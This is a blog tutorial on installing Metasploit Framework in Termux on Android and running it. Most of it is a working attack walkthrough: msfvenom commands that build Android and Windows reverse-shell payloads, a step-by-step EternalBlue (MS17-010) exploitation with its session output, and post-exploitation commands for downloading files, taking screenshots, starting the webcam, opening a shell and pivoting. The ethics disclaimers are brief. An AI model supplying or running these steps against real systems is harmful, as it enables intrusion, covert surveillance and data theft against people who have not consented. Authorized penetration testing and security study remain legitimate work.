Metasploit Framework in Termux
Table of Contents
Metasploit in Action
Watch this demonstration of Metasploit Framework running in Termux. The video shows the complete process from installation to executing penetration testing modules. This visual guide will help you understand how to transform your Android device into a powerful security testing platform.
The Metasploit Framework is one of the most powerful penetration testing platforms available, and now you can run it directly on your Android device using Termux. This comprehensive guide from Sandeep Tech will walk you through the entire process of installing, configuring, and using Metasploit in Termux for ethical hacking and security testing purposes.
What is Metasploit Framework?
Metasploit Framework is an open-source penetration testing platform that enables you to find, exploit, and validate vulnerabilities. It's one of the most widely used tools by security professionals, ethical hackers, and penetration testers worldwide. The framework provides a comprehensive suite of tools for developing and executing exploit code against a remote target machine.
Educational Purpose Only
Metasploit Framework should only be used for educational purposes and authorized security testing. Unauthorized use of penetration testing tools is illegal and unethical. Always obtain proper permission before conducting any security tests.
Why Use Metasploit in Termux?
Running Metasploit in Termux offers several advantages:
- Portability - Carry a powerful penetration testing platform in your pocket
- No Root Required - Works on non-rooted Android devices
- Cost-Effective - Free alternative to expensive penetration testing hardware
- Educational - Learn penetration testing techniques on the go
- Testing Environment - Quickly test your own networks for vulnerabilities
- Emergency Tool - Have a security toolkit available in emergency situations
Installation Guide
Installing Metasploit in Termux requires several steps due to its dependencies. Follow this guide carefully:
# Update and upgrade Termux packages
apt update && apt upgrade -y
Install the required dependencies:
# Install required packages
apt install wget curl git tar -y
Install the necessary development tools:
# Install development tools
pkg install openssl ruby make clang libffi libgmp libpcap postgresql readline sqlite -y
Install RubyGems and update it:
# Install RubyGems
gem install -v 1.17.2 bundler
# Update RubyGems
gem update --system
Now, let's install Metasploit Framework:
# Download Metasploit Framework
wget https://github.com/rapid7/metasploit-framework/archive/refs/tags/6.3.2.tar.gz
# Extract the archive
tar -xzf 6.3.2.tar.gz
# Navigate to the Metasploit directory
cd metasploit-framework-6.3.2
# Install the required gems
bundle install
Create a symbolic link to make msfconsole accessible from anywhere:
# Create a symbolic link
ln -sf $PWD/msfconsole /data/data/com.termux/files/usr/bin/msfconsole
# Make it executable
chmod +x /data/data/com.termux/files/usr/bin/msfconsole
Initialize the database:
# Initialize the database
msfdb init
Getting Started with Metasploit
Now that Metasploit is installed, let's start it and explore its interface:
# Start Metasploit console
msfconsole
When you first start Metasploit, you'll see a welcome screen and the msfconsole prompt:
.--. .-. | oo | | | | | | | .-' | | | ' | | | | | | | | | | | | | | | '------' '---' =[ metasploit v6.3.2-dev ] + -- --=[ 2235 exploits - 1193 auxiliary - 398 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: Writing a custom meterpreter script? Check out the meterpreter scripting API documentation msf6 >
The msfconsole prompt is where you'll enter all Metasploit commands. Let's explore some basic commands to get familiar with the interface.
Basic Usage and Commands
Here are some essential commands to get started with Metasploit:
Help and Information
# Show help menu
msf6 > help
# Show all commands
msf6 > ?
# Show information about a specific command
msf6 > ? search
Searching for Modules
# Search for exploits related to a specific service
msf6 > search type:exploit platform:windows smb
# Search for all modules related to Android
msf6 > search android
# Search for a specific module by name
msf6 > search eternalblue
Using Modules
# Use a specific module
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Show information about the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
# Show options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Show advanced options for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show advanced
# Show targets for the current module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets
Understanding Modules
Metasploit is modular, with each module serving a specific purpose. The main types of modules are:
- Exploits - Code that takes advantage of a vulnerability in a system
- Payloads - Code that runs on the target system after exploitation
- Auxiliary - Modules that perform scanning, fuzzing, sniffing, and other tasks
- Post - Modules that run on the target system after exploitation
- Evasion - Modules that help evade detection by security software
- Encoders - Modules that encode payloads to avoid detection
- Nops - Modules that generate no-operation instructions
Module Naming Convention
Metasploit modules follow a specific naming convention: type/platform/service/vulnerability. For example, exploit/windows/smb/ms17_010_eternalblue is an exploit for Windows systems targeting the SMB service with the MS17-010 vulnerability (EternalBlue).
Working with Payloads
Payloads are the code that runs on the target system after successful exploitation. Metasploit offers several types of payloads:
Types of Payloads
- Singles - Self-contained payloads that include everything needed to run
- Stagers - Small payloads that connect back to the attacker to download the rest of the payload
- Stageless - Complete payloads that don't require a staging process
Popular Payloads
# List all available payloads
msf6 > show payloads
# Set a payload for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
# Show options for the current payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payload options
Custom Payloads
You can create custom payloads using msfvenom, which is included with Metasploit:
# Create a custom Android payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 R > /sdcard/apk.apk
# Create a custom Windows payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
Using Exploits
Exploits are the core of Metasploit. Let's walk through the process of using an exploit:
# Select an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# Set the target IP address
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200
# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
# Set the local host (your IP)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100
# Set the local port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
# Verify the settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
If the exploit is successful, you'll get a Meterpreter session on the target system:
[*] 192.168.1.200:445 - Detected SMB version: Windows 7 Professional 7601 Service Pack 1
[*] 192.168.1.200:445 - Target is likely vulnerable to MS17-010
[*] 192.168.1.200:445 - Connecting to target for exploitation.
[*] 192.168.1.200:445 - Target OS selected valid for OS automatically but we will verify the
[*] 192.168.1.200:445 - Target arch selected valid for arch automatically but we will verify
[*] 192.168.1.200:445 - Attempting to exploit target with MS17-010...
[*] 192.168.1.200:445 - Exploit successful, waiting for connection...
[*] 192.168.1.200:445 - Connection established, sending payload...
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.200:49158) at 2023-07-25 14:30:45
meterpreter >
Post-Exploitation
Once you have a Meterpreter session, you can perform various post-exploitation tasks:
# Get system information
meterpreter > sysinfo
# Get current user
meterpreter > getuid
# List processes
meterpreter > ps
# List files in current directory
meterpreter > ls
# Change directory
meterpreter > cd C:\\
# Upload a file to the target
meterpreter > upload /sdcard/file.txt C:\\
# Download a file from the target
meterpreter > download C:\\important_file.txt /sdcard/
# Take a screenshot
meterpreter > screenshot
# Start the webcam
meterpreter > webcam_start
# Execute a command on the target
meterpreter > execute -f cmd.exe -c "whoami"
# Get a shell on the target
meterpreter > shell
Advanced Features
Metasploit offers several advanced features for more sophisticated penetration testing:
Pivoting
Pivoting allows you to route traffic through a compromised system to access other systems on the network:
# Add a route through the compromised system
meterpreter > run post/multi/manage/autoroute
# Background the current session
meterpreter > background
# Use the new route to scan the internal network
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.2.0/24
msf6 auxiliary(scanner/portscan/tcp) > run
Session Management
Metasploit allows you to manage multiple sessions simultaneously:
# List all active sessions
msf6 > sessions
# Interact with a specific session
msf6 > sessions -i 1
# Background the current session
meterpreter > background
# Kill a session
msf6 > sessions -k 1
Database Integration
Metasploit can integrate with a database to store scan results and manage hosts:
# Connect to the database
msf6 > db_connect
# Add hosts to the database
msf6 > db_nmap -sV 192.168.1.0/24
# List all hosts in the database
msf6 > hosts
# List all services in the database
msf6 > services
# List all vulnerabilities in the database
msf6 > vulns
Ethical Considerations
While Metasploit is a powerful tool, it's important to use it ethically and responsibly:
- Authorization - Always obtain explicit permission before testing any system
- Scope - Clearly define the scope of your testing and stay within it
- Documentation - Document all your findings and actions
- Confidentiality - Keep all sensitive information secure
- Non-Destructive - Avoid actions that could disrupt services or cause data loss
- Legal Compliance - Follow all applicable laws and regulations
Legal Warning
Unauthorized use of Metasploit or any penetration testing tools is illegal in most jurisdictions. This tutorial is for educational purposes only. Always obtain proper permission before conducting any security tests.
Interactive Demo
Try Metasploit Commands
Experience the power of Metasploit with our interactive command simulator. Try running some basic commands to see how they work.
Command Reference
Metasploit Commands
Command | Description | Example |
---|---|---|
msfconsole | Start the Metasploit console | msfconsole |
help | Show help menu | help |
search | Search for modules | search type:exploit platform:windows |
use | Select a module | use exploit/windows/smb/ms17_010_eternalblue |
info | Show information about the current module | info |
show options | Show options for the current module | show options |
set | Set a module option | set RHOSTS 192.168.1.100 |
set payload | Set the payload for the current module | set payload windows/meterpreter/reverse_tcp |
exploit | Launch the exploit | exploit |
sessions | List all active sessions | sessions |
db_nmap | Run Nmap and store results in the database | db_nmap -sV 192.168.1.0/24 |
You've now learned how to install and use Metasploit Framework in Termux. This powerful combination brings professional penetration testing capabilities to your Android device. For more tutorials and guides, check out other articles on Sandeep Tech. Remember to always use these tools ethically and with proper authorization.
Back to Blogs
Leave a Comment